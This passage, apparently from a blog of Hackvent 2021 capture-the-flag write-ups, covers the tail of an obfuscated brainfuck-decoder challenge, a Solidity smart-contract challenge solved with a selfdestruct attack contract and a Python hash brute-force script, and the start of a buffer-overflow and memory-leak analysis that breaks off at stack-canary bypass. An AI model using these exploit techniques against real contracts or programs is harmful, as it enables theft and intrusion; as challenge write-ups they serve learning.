\/*MLh3wxz0UW6UcLiirf*vwP.27~h$tpz1VBjakH-gN&amp;!-kp *\/\n  \"A-9v>$3%\"\n  \">d;+Yp+~++%+{f+T+!34+PW+Oc[5X0&lt;\"\t\/*RDCzF8Y0i,bbWa-MjYNq+,dO=,ty#U#z{740pXD{avr@3\n     MAtj *\/ \"H(+=+#=+F+)$T+Z*C++\"\n  \/*-MKeCw&amp;y*_Fq)_#Ac5{o4[6f5d#~AGi&amp;?g7YJ--Ck~fhXu*\/ \"J\"\n  
\"+$Y+##F>~-\"\t\t\t\/*Th2N8[9o(MGz6[*e0=l[_ic2*]]nawirp%j%;.Qb;0di@;Y%h&amp;_{mI~En'D,}2Trrm\n\t\t\t\t\t\t\t   d=88J,Te *\/ \"9]&amp;&lt;A-mBq-W>'rm>S>>C+jY+Q;+x\/+zm+1~\"\n\t\t\t\t\t\t\t\/*C@G9Yw-i6-^WHr#S71p1|WbfzMa(fm:\n\t\t\t\t\t\t\t\t\t   }--b3TC4+?h%nXX, *\/ \"+@:+Ic+[}-&lt;&lt;&lt;$_{&lt;&lt;A:%[$->s=>l6+4&lt;y&lt;7Y3[!\"\n\t\t\t\t\t\t\t\t\t\/*LBI&amp;T.E7+oGpFdKw;2\n\t\t\t\t\t\t\t   MppMYs;9H8Ow0X2Rz4W_Ti*5uEta *\/ \"-?>>!h->Wz+pg\"\n\t\t\t\t\t\t\t\/*o)Mf_X(c:X.+n@Bt0oH6kz5chq(n,SRUR\n\t\t\t\t\t\t\t\t\t\t   ag9bZh=O^^hl}-sNZa#I. *\/ \"*&lt;ie]dp>F)%>['->\/>e>>9a+&lt;:&lt;$b]5)&lt;l@&lt;rg&lt;a&lt;\"\n\t\t\t\t\t\t\t\t\t\t\/*+E!ctUOo:,Pa\n     )tGM~:G;HD@Tjb:: *\/ \"G}'])n>M!2>>=[T:-&lt;z&lt;'D\" \/*Iqb)U?mCXJ^$3Re *\/\n  \"1&lt;6+^>*>>]69&lt;@=&lt;j\"\n  \"~[J7u-;ZD>W+{e&lt;(c[I->Tf-B>T\" \/*qYD7M(S_XGcvuUL~_PekkwA5#6 *\/ \"_+>r>?1>G>T>&amp;%]9B\"\t\/*\n\t\t\t\t\t\t\t\t\t    Lv8ZDr?RjGs;-J3~o0X'!I6;Rw#r!R9,X&amp;;}4 *\/ \">n_[$S#->>p^W>J#>T>?s+7:>>A]E3$&lt;\"\n\t\t\t\t\t\t\t\t\t \/*=G:4V\n\t\t\t\t\t\t\t8=!d?OR6#j3*\/ \":?4&lt;5ER&lt;Y&lt;j?l&lt;i&lt;m&lt;5Y@&lt;f9]>sV>[-\"\n\t\t\t\t\t\t\t\/*'8DM^vq#_NjYs!:jP'u}{;&amp;{(m%H~Esu\n\t\t\t\t\t\t\t   !;?bv;q{&amp;0vt8$K$=iX7r)X$1@'11ozHm~)K&amp;{zO?MV7Ni{A^?VMrm!DyyNl *\/\n  \"7e&lt;jF3&lt;j:+&amp;g>>]:\"\n  \/*{_)xTWM0gydIb*\/ \"7>sM>>{[N-xp>g>;+6D%&lt;\" \/*1Gxb4RjC]zQl:x *\/ \"&lt;Y];>eH2[a>[\/-Q@_\"\t\/*5\n\t\t\t\t\t\t\t\t   klM%MTS7-G *\/ \"&lt;->]rZZ&lt;X[b\/*-Yw>f=t+7B&lt;B]b]W=m>!6[[7-\"\n\t\t\t\t\t\t\t\t\/*t3f]*Q[;~}5t:~hG:^KO[E)&amp;Jz\n     Shorl[Y *\/ \"xs]&lt;FTl&lt;&lt;[-)}>M^+?}>o-@\" \/*{_)xTWgydIb *\/\n  \"}&lt;aGu&lt;@=]w>84[(-7'&lt;7(P+Xlf>(;\"\n  \")]+\" \/*vv*A;-]y;yZtIPqxU2owVmKGltr{B4wb94]A2le'qZ?vrr7 *\/ \">(''+B+$?++J+cz+u\"\t\/*i;U\n\t\t\t\t\t\t\t   {N^-iw80 *\/ \"+$\/[?33-Rq&lt;([k't-'>>%b++6&lt;D&lt;9o\"\n\t\t\t\t\t\t\t\/*3MxfPEPA}iUt=WlP-Nk-jf2^x=W.qG]Ww9Kx\n     #I *\/ \"r]$K>@&amp;>&amp;[&amp;-\" \/*h7W0!8!b'Z *\/ \"S9&lt;&lt;V&amp;+XO5>%~>}]@&lt;IYO\" \/*n *\/ 
\"]&lt;ET{[}v-Y@w>ZT\"\t\/*7\n     bi)v1)FJ! *\/ \">f>O&amp;A>+GT&lt;*&lt;q&lt;&lt;]~>)u>;]&lt;5&lt;\" \/*'_]6z*OTYR^C| *\/ \"&lt;xH_]'>%V>xnX>>b\"\t\/*C@G\n     9Yw-i6-^WHr#S71p1|WbfzMa(fm:}--b3TC4+?h%nXX, *\/ \">&amp;[6L?&lt;&lt;L&lt;&lt;hW&lt;?&lt;\"\n  \/*!1.oC(f3 *\/ \"}1\"\n  \"&lt;gQ&lt;I%S&lt;&lt;+L>>p5>{V>>N\" \/*@17zHqHDXY}@er9=-V%@Q#xM(Bsh=P-6N%&amp;TR *\/ \">&amp;*\/>>%6&amp;>;@\"\t\/*\n     _iTnvnJbvi$[6 *\/ \">p-;]j&lt;H7&lt;&lt;e&lt;x&lt;8p&lt;'&lt;0u&lt;xd&lt;6\" \/*{W8~.?_~#O7#5 *\/\n  \"&lt;[_x>3>lSh+z'\/+pB\"\n  \"++#[>98++#&amp;++(+?Y+:o:+\" \/*6U *\/ \"S+h;p&lt;!8-?oE]{w&lt;;&amp;!+jn&lt;\" \/*0zau:c$EPm *\/\n  \"$@-[s$h>E\"\n  \/*n*\/ \"i+#}!>!?+>o@-~Gz[@>b>\" \/*zk-=LkVIqd8qvO9oH]wySCxT *\/ \")L*>y=]%gL&lt;gHO[}\"\t\/*Do~i\n     4Co(MS!Di *\/ \"\/^[eL?>YZv+Z*&lt;$-TR%]>>@(6+1>@]&lt;#&amp;\" \/*4BB;I;4BMN *\/ \"&lt;KV&amp;&lt;1(&lt;&lt;~-!\"\t\/*.AdT\n\t\t\t\t\t\t   0D+}1'2Y* *\/ \"]4oT]CsH>>E&amp;>[p$}-Nv%\"\n\t\t\t\t\t\t\/*Ry.)ero|r7~OW43_QlZMn_^%u^l@5x)O({)p%jgC&amp;~{5\n\t\t\t\t\t\t   BqHdfqlbVK(5{$'6O{})p'z~vcdsy:z7Yd!@Wh9JE25!+;*OfS *\/\n  \"]OtH+>4o-o-=#[H-VG[=&lt;-Z>qw\"\n  \"++q+*[A-(Tj]]Ko%]\" \/*!I *\/ \"GQr&lt;(%D[:+AEx+!Qc+k3\" \/*)# *\/ \"+Wg+'I+++t+=+:+KK+\"\t\/*ZSRJF\n     YKk *\/ \"Y&lt;[a>*-}V%[>$A^+?z)>>\/^]\" \/*mT0+D0v *\/ \"Wak>$[L+~$[$@8&lt;^k+YI?>24u-\"\t\/*A_AveOM{\n     5i~$OIQ *\/ \"(Sk]9>odv+{>>uIH]j~&lt;H&lt;1D$&lt;&lt;8:\" \/*B]NBoj~k *\/ \"&lt;-T}F]PD>SP\/>[&lt;@K+C>-)I\"\t\/*e\n   *Ii,8zF5-WU08d*\/ \":]x>[{-n)G[8-&lt;w#&lt;M[(-*}]V>^:*>7]*\" \/*|6Y} *\/\n  \"&lt;o@E&lt;a[n;c&lt;=&lt;#->x>$\"\n  \"1-#Z]FC^>s>({L]X&lt;\/I&lt;6Uk[?&lt;j\"\t\/*u~'=sq!L0XoM!d~bojCFsx7l~){VxF}Y:viR=7MM2!%K5!T63\n\t\t\t\t\t\t\t\t\t\t   ^1pT(ja4!3Kx?z4Eh=E_Ra:'dvYBs4'@Arb *\/ \"&lt;+a{m>3op>-GR]7]y&lt;;5[(-p]S&lt;cH.\"\n\t\t\t\t\t\t\t\t\t\t\/*Q,qTG32 *\/\n  \"'[8ZR-Rz9]b&lt;TZ*-;:,j+\" \/*_iTnvnJbvi$[6*\/ \"S]?++:A+q((+MS+C([O\"\n  \/*B]Nuoj~k *\/ \"#>)+W\"\n  \"+eL+w&amp;+$+%r\" \/*{W8~.?_~#O7#5 *\/ \"W+CUW+++{>J$O+;Y@++v#\" 
\/*0zau:c$EPm *\/ \"m+++!0H+*\"\t\/*\n     6U *\/ \"xr+n}$++eE++m#+(k}++\" \/*#]UMND&amp;x#isa?ha@i!ofa5+465a...476'}Yc@ *\/\n  \"&amp;++)_+9Gh+\"\n  \"Rg+s}+)&amp;P+b+\" \/*ob+W^Yl~lLu_&amp;X{ssO4\"- *\/ \"=+q+Bx&lt;K2&lt;-$B]\" \/*c;EB*^9'j *\/\n  \">(&amp;y.}%k>@\"\n  \".UZ[2[-]s\" \/*ys5P.ow5z$TA~D?3E[SnjF9G\"'x5$J,yC66&amp;vdjhdd%!I+mz *\/ \"=_&lt;]+&amp;#+l#++\"\t\/*e\n     0m=g *\/ \"*+pq+ed\" \/*rt#|Ex^fW *\/ \"+}+)\/++y.o\"\t\/*w;GPA++tv+x+=>+(pM+Yy_+h+92F9G\"'c#x5$J\n\t\t\t     ,3_y&lt;I%_M&lt;a *\/ \"TC[c#7-]W'\";\n\t\t\t  \/*-4Tugi5DA;?#\"R(@yBuxR*\/\nI (main) ()\n{\n  P (69);\t\t\t\/*?LcsZnTxv7^\n\t\t\t\t *\/\n  P (11 * \/*c;EB*^9'j *\/ 10);\n  I (K) \/*ob+W^Yl~lLu_&amp;X{ssO4\"- *\/  = (1 &lt;&lt; 6) + 2, L = (\t\/*4I'04h5D|_+3\n\t\t\t\t\t\t\t\t   bCM%6[&amp;[?X(N%e#[rhQI:UdJg *\/\n\t\t\t\t\t\t\t  4 &lt;&lt; 4) + 6;\n  P (58 * 2);\t\t\t\/*e0m=g *\/\n  P (101);\n  P ( \/*@Hc#=; *\/ 114);;\n  P (1\n\/*nGe5.6'*\/  &lt;&lt; 5);\n  P (107) \/*H2}\"jhB=g2N.?aS *\/ ;\n  P (101);\n  N (H) * c = b;\n  P (11\t\t\t\t\/*w=Pc4sIz2~BA;k)o\n\t\t\t\t *\/  * 11);\n  P (58 \/*?uK[ *\/ );\n  P (2 \/*>> *\/  &lt;&lt; 4);\n  H \/*j!jS *\/ k = \/*S1T% *\/ (H) G ();\n  I (i), s = 1 &lt;&lt; 15, p = 0;\n  U (H) m[1 &lt;&lt; 15] \/*@5&amp;o%OHT]5o1aDNsgiS|x]G:+^ *\/  =\n  {\n  0};\n  F (k != K \/*xskgVsQ.I]?FI]=b *\/  || G () != L)\n    0x90;\/\/R (2);\n  K = 0x34;\n  k = (H) G ();\n  F (k \/*_^%u^l@5HdfqlbVK(*\/  != K || G () != 58 * 2) 0x90;\/\/R (2);\n  k = (H) G ();\n  F\t\t\t\t\/*n_#\n       @j;2)$b *\/ (k != 104 || G () != 16 * \/*l3o_{Dl^%Z^h *\/ 5 + 21) 0x90;\/\/R (2);\n  k = ( \/*fr?BI1V9'~{?Ko *\/ H) G ();\n  F (k != 0x57 || G () != 4 * 25 + 5 \/*Mc0%{OfEl'%FL~);?;)l *\/ )0x90;\/\/R (2);\n  k = (H) G ();\n  F (k != 0x4E || G () != 36) 0x90;\/\/R (2);\n  k = (H) G ();\n  L = 105;\n  F (k != 82 || G () != L) 0x90;\/\/R (2);\n  k = (H) G ();\n  F (k != 103 || G () != k + 1) 0x90;\/\/R (2);\n  k = (H) G ();\n  F (k != 7 * 16 + 4 || G () != (2 &lt;&lt; 5) - 1) 0x90;\/\/R 
(2);\n  W (*c != 0) \/*1+GSg7D+r4SgGh+ *\/\n  {\n    S (*(c++))\n    {\n      C (43)++ m[p];\t\t\/*Qe_nbD:7]bO~l *\/\n      B;\n      C (44) m[p] = *d != 0 ? *(d++) : 0;\n      B;\n      C (45)-- m[p];\t\t\/*f% *\/\n      B;\n      C (46) P (m[p]);\n      B;\n      C (60) p = (p + s - 1) % s;\n      B;\n      C (62) p = (p + 1) % s;\t\/*ys5P.ow5z$F9G\"'x5$J,yC66&amp;vI+mz *\/\n      B;\n      C (91) F (!m[p])\n      {\n\ti = 0;\n\tW\t\t\t\/*Q.4UI339&amp;#yPNH|ldo*giA;?#\"R(@7|Eklhk!.)Ny:@UKg6w~-vm?HCy{oicbwuO\n\t\t\t\t   A1Ki^;=45SS@ *\/ (1)\n\t{\n\t  F (*c == 0) R (1);\n\t  F (*(c++) != 93 || --i >= 0)\n\t  {\n\t    F (*(c - 1) == 91)++ i;\n\t  }\n\t  E (B);\n\t}\n      }\n      B;\n      C (93) i = 0;\n      --c;\n      W (1)\n      {\n\tF (c &lt; b) R (1);\n\tF (*c\t\t\t\/*rt#|Exchjw6AcX1HkOsP~S&amp;$&amp;mazkig1,\"g;Di2GjM;=2\n\t\t\t\t   W7;_=JhX$i18J3cg]]6FQKmi(|Ok^fW *\/  != 91 || --i > 0)\n\t{\n\t  F (*(c--) == 93)++ i;\n\t}\n\tE (B);\n      }\n      B;\n    }\n  }\n  R (0);\n}\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-50-1024x597.png\" alt=\"\" class=\"wp-image-1775\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{-HidDeN-bRaiNF-Ck-dEcoDer-}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.13] Super Smart Santa<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"818\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25.png\" alt=\"\" class=\"wp-image-1726\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25.png 818w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-25-768x109.png 768w\" sizes=\"auto, (max-width: 818px) 100vw, 818px\" \/><\/figure>\n\n\n\n<h2 
class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>kuyaya<\/em>. Super smart indeed!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa wanted to be modern, so he asked his elves to transfer his gift contracts to&nbsp;<em>Solidity<\/em>. Did they do well?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Complete the contract! Meaning: set&nbsp;<code>isComplete<\/code>&nbsp;to&nbsp;<code>true<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hint<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Santa is using the Ropsten Testnet so you don&#8217;t become poor \ud83d\ude09<\/li>\n\n\n\n<li>To interact with the contract, Santa recommends using&nbsp;<em>Remix<\/em>&nbsp;&amp;&nbsp;<em>Metamask<\/em><\/li>\n\n\n\n<li>Be sure to set the environment to&nbsp;<em>Injected Web3<\/em><\/li>\n\n\n\n<li>&#8220;At Address&#8221; in&nbsp;<em>Remix<\/em>&nbsp;is a clickable button, you use it to interact with a contract.<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1018\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-1018x1024.png\" alt=\"\" class=\"wp-image-1727\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-1018x1024.png 1018w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-298x300.png 298w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-150x150.png 150w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-768x772.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26-1527x1536.png 1527w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-26.png 1786w\" sizes=\"auto, (max-width: 1018px) 100vw, 1018px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>A Blockchain challenge, very nice! 
To solve this challenge I worked with the <a rel=\"noreferrer noopener\" href=\"https:\/\/remix.ethereum.org\/\" target=\"_blank\">Remix<\/a> application and the <a rel=\"noreferrer noopener\" href=\"https:\/\/metamask.io\/\" target=\"_blank\">Metamask<\/a> wallet. On the website of the challenge we can see the Solidity code of the running contract and we can directly deploy the smart contract from there.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pragma solidity 0.4.22;\ncontract Santa {\n\tuint24 a;\n\tbytes32 b = 0x0619c10213c814eba28106f6c2472c5853b55a7c25855da514b806efc1128e55;\n\tbool public isComplete;\n\tbool c;\n\tuint256 d;\n\tconstructor() public payable {\n\t\trequire(msg.value == 0.0000000000000001 ether);\n\t\td = msg.value;\n\t}\n\tfunction e() public {\n\t\tif (keccak256(a) == b){\n\t\t\tisComplete = true;\n\t\t}\n\t}\n\tfunction f(int24 g) public{\n\t\trequire(c);\n\t\ta = uint24((0xdeadbeef) &lt;&lt;- (-31337) % 1337 >> (188495400 \/ 314159)) + uint24(g);\n\t}\n\tfunction h() public {\n\t\tuint256 i = d - address(this).balance;\n\t\trequire(i > 0);\n\t\tc = true;\n\t}\n}<\/pre>\n\n\n\n<p>The goal of the challenge is to interact with the smart contract and set the isComplete flag to true. Apparently we need to run the functions h() and f(), and then call e() to set the isComplete flag.<\/p>\n\n\n\n<p>The first problem is that we cannot interact with the contract, as there is no Ether stored in the contract. I solved this issue by creating my own smart contract, self-destructing it and sending the remaining Ether to the target contract of the challenge. Don&#8217;t forget to deploy your own contract with enough Ether in it, otherwise it will not work. 
This attack is documented on this website: <a rel=\"noreferrer noopener\" href=\"https:\/\/solidity-by-example.org\/hacks\/self-destruct\/\" target=\"_blank\">https:\/\/solidity-by-example.org\/hacks\/self-destruct\/<\/a>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pragma solidity ^0.8.10;\ncontract Attack {\n    uint256 d;\n    constructor() public payable {\n\t\td = msg.value;\n\t}\n    function attack() public payable {\n        \/\/ cast address to payable\n        address payable addr = payable(address(0xA15b278b7D804a0eda1a726Ba96f8688CDbC8E01));\n        selfdestruct(addr);\n    }\n}<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-52-1024x645.png\" alt=\"\" class=\"wp-image-1779\"\/><\/figure>\n\n\n\n<p>Now we have enough Ether on the target smart contract to execute all the functions. 
First we need to figure out what parameter to send to the function f(), in order to get the right keccak256() hash for &#8220;a&#8221;: <\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0x0619c10213c814eba28106f6c2472c5853b55a7c25855da514b806efc1128e55\"<\/pre>\n\n\n\n<p>I wrote a Python program to calculate the right value for f():<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nfrom Crypto.Hash import keccak\nimport binascii\ncorrect_hash = hex(int(0x0619c10213c814eba28106f6c2472c5853b55a7c25855da514b806efc1128e55))\ndef f(g):\n\t#this just calculates +228022 ?\n\t#a = int(int(0xdeadbeef) &lt;&lt;- (-31337) % 1337 >> int(188495400 \/ 314159)) + int(g)\n\ta = g + 228022\n\t#convert signed integer to hex\n\ta = hex(a &amp; 0xffffff)[2:]\n\t# ugly\n\tif not ((len(a) % 2) == 0):\n\t\ta = \"0\"+a\n\ta = binascii.unhexlify(a)\n\treturn hex(int(keccak.new(data=a, digest_bits=256).hexdigest(), 16))\nx = f(-2406872)\nif x == correct_hash:\n\tprint(\"[!] Correct number found: \" + str(x))\nx = -2406800\nwhile x > -2500000:\n\tres = f(x)\n\tprint(\"[+] Trying: \" + str(x))\n\tif res == correct_hash:\n\t\tprint(\"[!] Correct number found: \" + str(x))\n\t\tbreak\n\tx -= 1<\/pre>\n\n\n\n<p>The Python script returns &#8220;-2406872&#8221; as the correct parameter for f(). Finally, we can call the functions in the right order (h(), f(-2406872), e()) and get the flag. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-53-1024x689.png\" alt=\"\" class=\"wp-image-1780\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-54-1024x234.png\" alt=\"\" class=\"wp-image-1781\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{sm4rt-&gt;sm4rter-&gt;y0u}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.14] Santa&#8217;s Wish Service<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"820\" height=\"126\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27.png\" alt=\"\" class=\"wp-image-1728\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27.png 820w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27-300x46.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-27-768x118.png 768w\" sizes=\"auto, (max-width: 820px) 100vw, 820px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>sm4sh1t<\/em>. Best wishes!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa&#8217;s elves attended a programming course. With their new skills they started implementing a service which can be used by everyone to hand in their Christmas wishes. 
The elves don&#8217;t have any experience in such tasks, so they are hoping that nobody makes their heart bleed.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you break the service and get their secret?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Resources<\/h2>\n\n\n\n<p>You&#8217;ll probably need&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/a467b097-b352-4f35-817b-8fa78dbfd830.zip\" target=\"_blank\" rel=\"noreferrer noopener\">these files<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Binary exploitation on day 14; this felt way too hard for a medium challenge&#8230; I really like solving these kinds of challenges, although it is super hard for me because I lack practice. Thus, I am even happier to have solved this challenge in time. <\/p>\n\n\n\n<p>I tackled this challenge using <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/longld\/peda\" target=\"_blank\">PEDA in gdb<\/a>, <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/Gallopsled\/pwntools#readme\" target=\"_blank\">PwnTools<\/a> for Python, <a rel=\"noreferrer noopener\" href=\"https:\/\/ghidra-sre.org\/\" target=\"_blank\">Ghidra<\/a> for disassembling and <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/sashs\/Ropper\" target=\"_blank\">ropper<\/a> to find the ROP gadgets. 
Moreover, the following resources did help me a lot!<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/\" target=\"_blank\">https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/stacklikemind.io\/ret2libc-aslr\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/stacklikemind.io\/ret2libc-aslr<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/mdanilor.github.io\/posts\/memory-protections\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/mdanilor.github.io\/posts\/memory-protections\/<\/a><\/li>\n<\/ul>\n\n\n\n<p>The first thing I did was to analyze the binary file itself. And poah, almost all protection mechanisms are enabled. The libc.so of the server is provided too, which means that most likely ASLR is enabled on the server. We have a 64-bit Linux ELF binary with the following protection mechanisms enabled:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"582\" height=\"194\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-55.png\" alt=\"\" class=\"wp-image-1784\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-55.png 582w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-55-300x100.png 300w\" sizes=\"auto, (max-width: 582px) 100vw, 582px\" \/><\/figure>\n\n\n\n<p>Program flow:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"393\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-1024x393.png\" alt=\"\" class=\"wp-image-1788\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-1024x393.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-300x115.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-768x295.png 768w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-1536x590.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-57-2048x786.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Next, I took a look at the binary file in Ghidra:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"744\" height=\"588\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-56.png\" alt=\"\" class=\"wp-image-1785\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-56.png 744w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-56-300x237.png 300w\" sizes=\"auto, (max-width: 744px) 100vw, 744px\" \/><\/figure>\n\n\n\n<p>On line 9 we can see that the variable &#8220;local_d8&#8221; is an array with a length of 200 (<strong>decimal<\/strong>). On line 17 we have the menu selection, and on line 20 the amount of wishes is read. <\/p>\n\n\n\n<p>Line 23 reads 0x200 (<strong>hexadecimal<\/strong>!) bytes into the variable &#8220;local_d8&#8221;! The variable was declared with a size of 200 decimal, and now we can write 0x200, which is 512 in decimal, to the array. This means we can overflow the variable &#8220;local_d8&#8221; by 312 bytes! This is the buffer overflow of the program.<\/p>\n\n\n\n<p>On line 25 the variable &#8220;local_d8&#8221; is written to the output; however, the number of bytes written is specified in the variable &#8220;local_da&#8221;. Exactly, this comes from our input &#8220;amount of wishes&#8221;. This means that we can specify a high amount of wishes, enter only a few characters as the wish, and get the memory that follows our input in return. In addition to the buffer overflow, we have a memory leak in the program. A perfect starting point for circumventing the protection mechanisms in place! <\/p>\n\n\n\n<p>Let&#8217;s try out both errors in the program. 
Buffer overflow:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"205\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-1024x205.png\" alt=\"\" class=\"wp-image-1789\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-1024x205.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-300x60.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-768x154.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-1536x308.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-58-2048x410.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Memory leak:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"129\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-1024x129.png\" alt=\"\" class=\"wp-image-1790\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-1024x129.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-300x38.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-768x96.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-1536x193.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-59-2048x257.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Step 1 &#8211; Circumvent stack canary<\/h3>\n\n\n\n<p>Main tutorial used: <a href=\"https:\/\/www.sans.org\/blog\/stack-canaries-gingerly-sidestepping-the-cage\/\" target=\"_blank\" rel=\"noreferrer 